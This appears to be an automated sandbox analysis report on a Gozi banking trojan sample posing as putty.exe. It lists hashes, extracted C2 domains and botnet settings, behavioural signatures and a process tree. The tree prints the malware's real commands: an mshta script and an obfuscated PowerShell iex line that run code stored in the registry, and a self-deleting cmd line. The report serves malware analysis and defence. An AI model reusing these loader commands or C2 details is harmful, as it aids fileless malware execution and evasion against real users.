gozi | 2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40

Analysis

max time kernel
150s
max time network
123s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
06-10-2023 12:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

putty.exe
Size

293KB
MD5

01435632dca9afc151eec77862bfbc2b
SHA1

9bbb4ae83131fafcd14d580810b14f48d2d30837
SHA256

2adca18a6ba459e5325ce934d473c08a411ae5b8049ca4c37ea9b300553b1f40
SHA512

61e542b6413381f6c4d0f7e08154d7d6dbe44fe9879788b1b6a3d2b32c51ce93dc0a18ac5efb87a6a91292e95c97dd15eaf50c109f869f1acfee6087c10fd677
SSDEEP

3072:28g/bYYX0XH1anZAsaA6eRESzHxHH3zt8l7Mjd1i0ot:DyYa0XUZdaAnEqHxn3R82i0o

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

mifrutty.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

mifrutty.com

systemcheck.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

792 cmd.exe

pid	process
792	cmd.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 1800 set thread context of 1224	1800	powershell.exe	Explorer.EXE
PID 1224 set thread context of 792	1224	Explorer.EXE	cmd.exe
PID 792 set thread context of 3056	792	cmd.exe	PING.EXE
PID 1224 set thread context of 1928	1224	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3056 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

3056 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
3056	PING.EXE

pid	process
3056	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

putty.exepowershell.exeExplorer.EXE

pid	process
2412	putty.exe
1800	powershell.exe
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE
1224	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1224 Explorer.EXE
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

1800 powershell.exe
1224 Explorer.EXE
792 cmd.exe
1224 Explorer.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1800 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

1224 Explorer.EXE

pid	process
1224	Explorer.EXE

pid	process
1800	powershell.exe
1224	Explorer.EXE
792	cmd.exe
1224	Explorer.EXE

description	pid	process
Token: SeDebugPrivilege	1800	powershell.exe

pid	process
1224	Explorer.EXE

Suspicious use of WriteProcessMemory 37 IoCs

Processes:

mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 1488 wrote to memory of 1800	1488	mshta.exe	powershell.exe
PID 1488 wrote to memory of 1800	1488	mshta.exe	powershell.exe
PID 1488 wrote to memory of 1800	1488	mshta.exe	powershell.exe
PID 1800 wrote to memory of 1028	1800	powershell.exe	csc.exe
PID 1800 wrote to memory of 1028	1800	powershell.exe	csc.exe
PID 1800 wrote to memory of 1028	1800	powershell.exe	csc.exe
PID 1028 wrote to memory of 2012	1028	csc.exe	cvtres.exe
PID 1028 wrote to memory of 2012	1028	csc.exe	cvtres.exe
PID 1028 wrote to memory of 2012	1028	csc.exe	cvtres.exe
PID 1800 wrote to memory of 1692	1800	powershell.exe	csc.exe
PID 1800 wrote to memory of 1692	1800	powershell.exe	csc.exe
PID 1800 wrote to memory of 1692	1800	powershell.exe	csc.exe
PID 1692 wrote to memory of 2424	1692	csc.exe	cvtres.exe
PID 1692 wrote to memory of 2424	1692	csc.exe	cvtres.exe
PID 1692 wrote to memory of 2424	1692	csc.exe	cvtres.exe
PID 1800 wrote to memory of 1224	1800	powershell.exe	Explorer.EXE
PID 1800 wrote to memory of 1224	1800	powershell.exe	Explorer.EXE
PID 1800 wrote to memory of 1224	1800	powershell.exe	Explorer.EXE
PID 1224 wrote to memory of 792	1224	Explorer.EXE	cmd.exe
PID 1224 wrote to memory of 792	1224	Explorer.EXE	cmd.exe
PID 1224 wrote to memory of 792	1224	Explorer.EXE	cmd.exe
PID 1224 wrote to memory of 792	1224	Explorer.EXE	cmd.exe
PID 1224 wrote to memory of 792	1224	Explorer.EXE	cmd.exe
PID 1224 wrote to memory of 792	1224	Explorer.EXE	cmd.exe
PID 792 wrote to memory of 3056	792	cmd.exe	PING.EXE
PID 792 wrote to memory of 3056	792	cmd.exe	PING.EXE
PID 792 wrote to memory of 3056	792	cmd.exe	PING.EXE
PID 792 wrote to memory of 3056	792	cmd.exe	PING.EXE
PID 792 wrote to memory of 3056	792	cmd.exe	PING.EXE
PID 792 wrote to memory of 3056	792	cmd.exe	PING.EXE
PID 1224 wrote to memory of 1928	1224	Explorer.EXE	cmd.exe
PID 1224 wrote to memory of 1928	1224	Explorer.EXE	cmd.exe
PID 1224 wrote to memory of 1928	1224	Explorer.EXE	cmd.exe
PID 1224 wrote to memory of 1928	1224	Explorer.EXE	cmd.exe
PID 1224 wrote to memory of 1928	1224	Explorer.EXE	cmd.exe
PID 1224 wrote to memory of 1928	1224	Explorer.EXE	cmd.exe
PID 1224 wrote to memory of 1928	1224	Explorer.EXE	cmd.exe

C:\Users\Admin\AppData\Local\Temp\putty.exe
"C:\Users\Admin\AppData\Local\Temp\putty.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2412

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1224

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>F9pe='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F9pe).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\3C64491B-6BF2-CEE4-D530-CFE2D9647336\\\MusicWhite'));if(!window.flag)close()</script>"
2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name qbdbmxygfv -value gp; new-alias -name uurkfvh -value iex; uurkfvh ([System.Text.Encoding]::ASCII.GetString((qbdbmxygfv "HKCU:Software\AppDataLow\Software\Microsoft\3C64491B-6BF2-CEE4-D530-CFE2D9647336").ControlText))
3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1800

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kspcygvj.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1028

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES14C9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC14C8.tmp"
5⤵
PID:2012

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i2wxmihq.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1692

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1556.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1555.tmp"
5⤵
PID:2424

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\putty.exe"
2⤵
- Deletes itself
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:792

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3056

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:1928

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES14C9.tmp
Filesize
1KB

MD5
0f1aee0d65d321aa1837ca3de37cc4b8

SHA1
33bb3448448091da1e5438f5016a0d09762813cd

SHA256
17e2533a85a0fd2c19808f2e27f4448f69f76dae146c6b69e8ffae8e0d94cc1d

SHA512
ac5457267e39b77632b059bdda4821743d2952f3b153cbed4cac45ddd95102794e6afbe9bb22b0915f3050a5c1aa7d748b2f433669dec3c830cdb36824fb719b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES1556.tmp
Filesize
1KB

MD5
04b5e2b42c7ffe8e3aee1e85680385eb

SHA1
b4a2db4d62e42208fced7c31590293a915aa5827

SHA256
c12bc4e295797afbc59f5c33eb71ab02fe2f4ac764dae4dbca043744785fe8cb

SHA512
595869a60b812423e4a35468938ce23a4a4e7217f82f08acba002d5444fc6a4ca0a953fb7376dc03bdaf9829aa86f1d80aa90732dfa2295e4643d85439f366a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\i2wxmihq.dll
Filesize
3KB

MD5
164189d96d2f955ed2b6f5c01a573a9d

SHA1
81b1dce8108e727f622512ca9daee05a9b3914f4

SHA256
85829e43d426f10f118b9dfa3abbe8444580b603a64fda2a5653ed35418ebc74

SHA512
bf7de795bcf459ba55fa579c04963166c7407f5b03d80f00e39a327dfe553bb0e69b725f5d6cff3b4e5468da2dd0dd450e620e6aa12a835b75bdcb7f2f9644fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\i2wxmihq.pdb
Filesize
7KB

MD5
c523e58447c2a66c84fa20139a729780

SHA1
f2317fe341d976ff677b7ee13615a8700d59c887

SHA256
9d052396d6634b7925df35ca65111e39b2b8f2daf3cc295743f5f1e6542f774b

SHA512
cf2fc9c2415cbf5b7c2bcca1ead1bf0d54f4420428c0ad81f11405c2b609fdc288aa6c121ca3d4c1db82629485c684d0c87275cc061c71f64a52fbf7a370979a

Download Submit
C:\Users\Admin\AppData\Local\Temp\kspcygvj.dll
Filesize
3KB

MD5
47e6ab2bf25c3aad9e1303fb4183ddb4

SHA1
61262b6ea9bf86240eb6c1e78f75f07dbef4b616

SHA256
3590632733de018b7c1f1d525c5a4dd1f298efd4d11b49cb5c8775c608285710

SHA512
753fbb06b1417c6ef5ce43094ab45f8f26a16bfa5ac907ac48509faff275d3bcf1ba638d105c778a4ad8fcfcb9a3b6fe4b1a7a32434d0d77c9805ef97d14fcff

Download Submit
C:\Users\Admin\AppData\Local\Temp\kspcygvj.pdb
Filesize
7KB

MD5
18f25a827944611a5dcbc4490d1525a9

SHA1
963886dcc84e0a7fc78ac7ab2450759eb2361b7a

SHA256
151600185e380d3d4d2d970ef0cb611bc16c8a32a1c7be68688c60573b79f264

SHA512
f06be3bebb4c8592a55d2f0184d46ce4100189c7651714b2a18d21824f714b1d23e5a7e4789ffff165cef193c6477465da6938d74ac1d88d109469edb914fbba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC14C8.tmp
Filesize
652B

MD5
f020838513d2305213aa36ac52532984

SHA1
a261c52119da0648bdcfa8c27ed052b848e33e70

SHA256
5743b0103e59cd9c606ae3c60c305981e6408223c5a1fafdf281b0a435b82592

SHA512
b491567edd13b84b5b72419131798c65a12a3e86f8c0c567de4351d58e9b85fdcf7002332f8bb333e2f1b0d02ba18b59a3fea63b2c6a6e52e6fe486325503cb2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC1555.tmp
Filesize
652B

MD5
ca40765c0c111471edd671f7213f33e6

SHA1
d17afde8a541c422621f5c049f8f38a039e419f5

SHA256
d52f7bf47127badda563969e58ed72dbb49ce240a0c05b37d2451bf09172fbee

SHA512
0b5f421cae6516fad04ac2aadc4f25dc8dc66a38bddd2fc091219c215ebb2174bd98a646f7961cc4b4369dafa6d1615aef1107c09c40f37f0db2c59ff92db052

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i2wxmihq.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i2wxmihq.cmdline
Filesize
309B

MD5
088376e94f08768affbbca971a8ff72a

SHA1
94db8c5da7fac77f257bc7bd480227e436c5a13b

SHA256
571f965f86940cb8007c698ec8d0c66edfd7672bae789015d0c03f5d1d07c8d1

SHA512
1c0b5657469a872101ee6148be8b301a82a2333d4f93798886e678a9ad33b57108d5b5fb3d8977e993f8877edad1cfa5975235b771f57556befa1204dde29e7d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kspcygvj.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kspcygvj.cmdline
Filesize
309B

MD5
1e45bc7962528900c9cf0735cb62fa91

SHA1
1b331d6e3d5f1f9f4b2160e14c49020fd320587b

SHA256
cc44c03feff50791e468f1b0802beaf1ee841a2cc996fb6866af31dcb103f8b5

SHA512
48ceb415f3c3c1cdf1a9e03104e02652c2bcaf535a351a58b55df5c1de01168c6f62288a83d4222ede9162070f88759f85bc22a842b80f2a3e1bfc5494ad2c7a

Download Submit
memory/792-76-0x000007FFFFFD9000-0x000007FFFFFDA000-memory.dmp

Filesize
4KB

Download
memory/792-78-0x0000000000110000-0x0000000000111000-memory.dmp

Filesize
4KB

Download
memory/792-77-0x00000000004B0000-0x0000000000554000-memory.dmp

Filesize
656KB

Download
memory/792-94-0x00000000004B0000-0x0000000000554000-memory.dmp

Filesize
656KB

Download
memory/1028-36-0x0000000002170000-0x00000000021F0000-memory.dmp

Filesize
512KB

Download
memory/1224-66-0x00000000029A0000-0x00000000029A1000-memory.dmp

Filesize
4KB

Download
memory/1224-65-0x0000000004C10000-0x0000000004CB4000-memory.dmp

Filesize
656KB

Download
memory/1800-27-0x0000000002850000-0x00000000028D0000-memory.dmp

Filesize
512KB

Download
memory/1800-61-0x0000000002830000-0x0000000002838000-memory.dmp

Filesize
32KB

Download
memory/1800-45-0x0000000002820000-0x0000000002828000-memory.dmp

Filesize
32KB

Download
memory/1800-29-0x0000000002850000-0x00000000028D0000-memory.dmp

Filesize
512KB

Download
memory/1800-28-0x0000000002850000-0x00000000028D0000-memory.dmp

Filesize
512KB

Download
memory/1800-30-0x000007FEF28E0000-0x000007FEF327D000-memory.dmp

Filesize
9.6MB

Download
memory/1800-26-0x000007FEF28E0000-0x000007FEF327D000-memory.dmp

Filesize
9.6MB

Download
memory/1800-68-0x000007FEF28E0000-0x000007FEF327D000-memory.dmp

Filesize
9.6MB

Download
memory/1800-25-0x0000000002620000-0x0000000002628000-memory.dmp

Filesize
32KB

Download
memory/1800-24-0x000000001B440000-0x000000001B722000-memory.dmp

Filesize
2.9MB

Download
memory/1800-70-0x00000000029D0000-0x0000000002A0D000-memory.dmp

Filesize
244KB

Download
memory/1800-64-0x00000000029D0000-0x0000000002A0D000-memory.dmp

Filesize
244KB

Download
memory/1928-89-0x00000000004B0000-0x0000000000548000-memory.dmp

Filesize
608KB

Download
memory/1928-92-0x00000000004B0000-0x0000000000548000-memory.dmp

Filesize
608KB

Download
memory/2412-8-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/2412-9-0x0000000000220000-0x000000000022B000-memory.dmp

Filesize
44KB

Download
memory/2412-7-0x00000000023F0000-0x00000000024F0000-memory.dmp

Filesize
1024KB

Download
memory/2412-4-0x0000000000280000-0x000000000028D000-memory.dmp

Filesize
52KB

Download
memory/2412-3-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/2412-19-0x0000000003EC0000-0x0000000003EC2000-memory.dmp

Filesize
8KB

Download
memory/2412-1-0x00000000023F0000-0x00000000024F0000-memory.dmp

Filesize
1024KB

Download
memory/2412-2-0x0000000000220000-0x000000000022B000-memory.dmp

Filesize
44KB

Download
memory/3056-83-0x000007FFFFFD8000-0x000007FFFFFD9000-memory.dmp

Filesize
4KB

Download
memory/3056-84-0x0000000001BC0000-0x0000000001C64000-memory.dmp

Filesize
656KB

Download
memory/3056-93-0x0000000001BC0000-0x0000000001C64000-memory.dmp

Filesize
656KB

Download